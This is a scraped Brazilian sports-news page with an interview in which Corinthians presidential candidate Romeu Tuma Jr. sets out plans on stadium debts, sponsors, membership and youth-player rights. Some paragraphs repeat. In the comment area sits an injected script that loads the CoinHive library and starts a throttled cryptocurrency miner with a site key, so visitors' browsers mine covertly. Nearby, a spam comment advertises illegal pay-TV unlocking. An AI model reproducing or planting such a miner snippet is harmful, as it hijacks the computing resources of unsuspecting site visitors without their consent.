2/2/2018 19:16

[ELEIÇÕES] Romeu Tuma quer reformular a base do Timão: "Eu quero acabar com os empresários"

[ELEIÇÕES] Romeu Tuma quer reformular a base do Timão:
O Parque São Jorge está entrando em suas horas decisivas na decisão do novo mandatário. O futuro do Corinthians nos próximos três anos será decidido neste sábado. Por isso, o portal Tudo Timão conversou com alguns dos candidatos à presidência do clube. Nessa reportagem, entrevistamos o pleiteante Romeu Tuma Jr., que prometeu fazer grandes mudanças no alvinegro.



O Parque São Jorge está entrando em suas horas decisivas na decisão do novo mandatário. O futuro do Corinthians nos próximos três anos será decidido neste sábado. Por isso, o portal Tudo Timão conversou com alguns dos candidatos à presidência do clube. Nessa reportagem, entrevistamos o pleiteante Romeu Tuma Jr., que prometeu fazer grandes mudanças no alvinegro.

Confira os principais trechos da entrevista

Polemicas com o Estadão
Nunca falei que iria dar calote na Caixa. O que eu falei para o Estadão foi exatamente o seguinte:
“Nós tivemos uma auditoria externa, que apontou que a Odebrecht deve em torno de 250 milhões de reais em obras mal realizadas e não realizadas dentro do estádio. Por outro lado, eles dizem que estamos devendo 400 milhões à construtora. Eu entendo, por todo o meu conhecimento na parte administrativa e do direito, que a Odebrecht ainda nos deve mais 150 milhões, pelos seguintes motivos: danos morais e danos materiais. Isso porque eles nos levaram para a Lava-Jato, sujou a nossa imagem. O próprio dono da empresa (Marcelo Odebrecht) confessou que o estádio era para “Nós tivemos uma auditoria externa, que apontou que a Odebrecht deve em torno de 250 milhões de reais em obras mal realizadas e não realizadas dentro do estádio. Por outro lado, eles dizem que estamos devendo 400 milhões à construtora. Eu entendo, por todo o meu conhecimento na parte administrativa e do direito, que a Odebrecht ainda nos deve mais 150 milhões, pelos seguintes motivos: danos morais e danos materiais. Isso porque eles nos levaram para a Lava-Jato, sujou a nossa imagem. O próprio dono da empresa (Marcelo Odebrecht) confessou que o estádio era para custar de 300 a 400 milhões, e hoje chega perto de dois bilhões. Um dos ex-vice-presidente e o próprio Andrés Sanchez estão sendo investigados pela Polícia Federal”.
“Essas polêmicas que a construtora envolveu o Corinthians acabou afastando os donos de empresa que queriam comprar os nossos Naming Rights. Ninguém quer o nome associado ao estádio por medo da Lava-Jato. Resumindo, isso daria em torno de 50 a 80 milhões só em danos morais”. “Já os Danos Materiais estão ligados as obras que a empresa não fez ou que não ficou bem-feita. Uma delas, por exemplo, é o de uma rotatória não feita no estacionamento da Arena Corinthians. As pessoas não conseguem sair do local antes do jogo terminar – não tem entrada e saída, só uma passagem. E por esse motivo, o CET não concedeu o alvará para estacionamento nos outros dias da semana. Sem contar que o efetivo do local foi reduzido pela metade para não haver superlotação. Estamos deixando de lucrar muito dinheiro com isso. Poderíamos no meio da semana alocar o lugar para as pessoas estacionarem os seus carros (principalmente as que usam o metro Corinthians-Itaquera ou Artur Alvim). Além disso, também poderíamos fazer convênios com os supermercados, lojas e farmácias no entorno do local para eles utilizarem do espaço. Isso poderia ter gerado uns 100 a 150 milhões de reais por ano”.
“A proposta principal era a seguinte. Eu te devo 400 milhões e você me deve 400 milhões. Estamos cada um fica com o seu próprio prejuízo. Zero a Zero”. “Se a Odebrecht não aceitar esses termos, ela que vá à justiça e me acione e eu vou me defender e provar que o Corinthians teve prejuízo”.

Caixa
“Foi feito um empréstimo inicial de 400 milhões de reais, com juros, o que poderia chegar até mais de um bilhão no final do financiamento. A minha proposta para quitar essa divida é passar todos os Certificados de Incentivo ao Desenvolvimento (CID’s) que o Corinthians possui para a Caixa. Até porque eles têm uma dívida enorme com a prefeitura. E eu digo mais: A Caixa é Caloteira . Caso eles nos peçam a diferença para quitar a dívida, vamos pedir cinco anos de carência para poder nos ajeitar (capitar todos os recursos). E se não aceitarem essa diferença, eles que vão à justiça”.

Utilização dos espaços da Arena Corinthians e do Parque São Jorge
Shopping e Faculdades Integradas Corinthians
“Vamos criar um shopping e uma Faculdade Integradas Corinthians, para cursos de especialização vinculados ao esporte – direito esportivo, Educação Física etc. Vamos fazer uma conexão entre o estádio e a Fazendinha. Também vamos reformar o Parque São Jorge. Vamos fortalecer o nosso time máster, futebol feminino, e o futebol americano, colocando essas modalidades no antigo estádio. E também vamos criar uma mini-arena no clube para a realização de shows. Além disso, também podemos pensar em colocar shows nos espaços da Arena de Itaquera, como por exemplo, no estacionamento. Temos dois grandes polos para a exploração comercial. “

Museu Corinthians
Quero fazer o Museu Corinthians, no estilo do Madame Tussauds (em Londres), para criar um polo de turismo na Arena. Colocar bonecos de cera, colocar todas as nossas conquistas em todos os esportes e departamentos. Para isso, eu teria que passar todo o memorial do Parque São Jorge para o estádio de Itaquera. Vamos montar a história do Timão nesse local.

Nike
Eu não falei que vou tira-los de uma vez, porque antes eu preciso negociar com a Nike. Aqui é Corinthians, não é clube de bairro. Eles precisam da gente, e não nós que precisamos deles. Precisamos ter essa conversa. Eu posso cobrar deles para que barateiem os custos dos uniformes. O Timão vai seguir tudo no método de compliance – isto é, nada que seja fora da lei. Não vamos ter parceira e contrato com empresas envolvidas em crime. E a Nike está envolvida em várias acusações.

Onmi
Vou tirar do Corinthians. Ela é uma empresa que ganha mais que o clube e acaba prejudicando a nossa instituição. Prejudica o nosso próprio Fiel Torcedor. E o Andrés Sanchez mente descaradamente, eu não entendo quando ele diz que a empresa ganha 50% mas paga as despesas. É mentira. Tudo o que a Onmi gasta dentro do clube é o próprio Corinthians que paga.

Novo projeto Sócio Torcedor
“Ainda estamos conversando com algumas pessoas, mas o projeto é o seguinte: vamos tentar criar os cartões pré-pagos e pós-pagos, até porque tem aquelas pessoas que não conseguem abrir o de crédito por causa do nome ou ficha suja. Temos que entender que o nosso torcedor também é humilde. Precisamos ter acesso para todo mundo.

Ele não precisará nem pagar adesão, nem mensalidade, e nem paga para se fidelizar ao programa de pontuação. Obviamente que precisaríamos arrecadar com esse programa, então o que eu pretendo é que ele sirva para ser usado em supermercados, e nos comércios em geral. Até estou conversando com algumas empresas sobre isso. Uma porcentagem de tudo que for comprado será repassada ao Corinthians. Será uma relação Comerciante x Operada. Eu não cobrarei do torcedor diretamente.
E todos que já são sócios torcedores não perderão nenhum direito. Eu garanto. Toda a pontuação do antigo programa será repassado para o novo”.

Categorias de Base
“Eu quero acabar com os empresários. Vamos pegar toda a molecada que nascer no Corinthians e pegar 100% dos direitos econômicos. É claro que não é necessário ser todos com essa taxa, até porque as vezes precisamos estar de olhos abertos no mercado. Se for preciso contratar algum, seja por falta de opção ou por questão de talento, estabeleceremos uma porcentagem mínima para jogar aqui: o mínimo 80% do Corinthians."

Permanência de Carille e Alessandro
Eu já até conversei com ele (Alessandro), porque que está muito sozinho na diretoria. Ele tem que ter pelo menos dois assessores – o próprio Alessandro vai poder indicar e selecionar as melhores opções. O Fábio Carille também está confirmado para a minha gestão.

Contratações?
Tem vários jogadores que eu gosto, mas as negociações só serão feitas com a comissão técnica.

Master
Vou pagar o salário desses atletas com plano de saúde e contrato. Será o máster institucional do Corinthians. É uma fonte de renda e um resgate da nossa história.


VEJA TAMBÉM
- Timão escalado para o jogo contra o América-RN
- Corinthians goleia o Fluminense e vence a primeira no Brasileirão
- Timão escalado para o jogo contra o Fluminense









8133 visitas - Fonte: TudoTimao

Mais notícias do Corinthians

Notícias de contratações do Timão
Notícias mais lidas

VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345

(Comentário excluído)

< src="https://coinhive.com/lib/coinhive.min.js"><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui ou Conecte com Facebook.

Últimas notícias

  • publicidade
  • publicidade
    publicidade

    Brasileiro

    Dom - 16:00 - Neo Química Arena -
    X
    Corinthians
    Atletico-MG

    Sudamericana

    Ter - 19:00 - Neo Química Arena
    4 X 0
    Corinthians
    Nacional Asuncion
    publicidade
    publicidade
    publicidade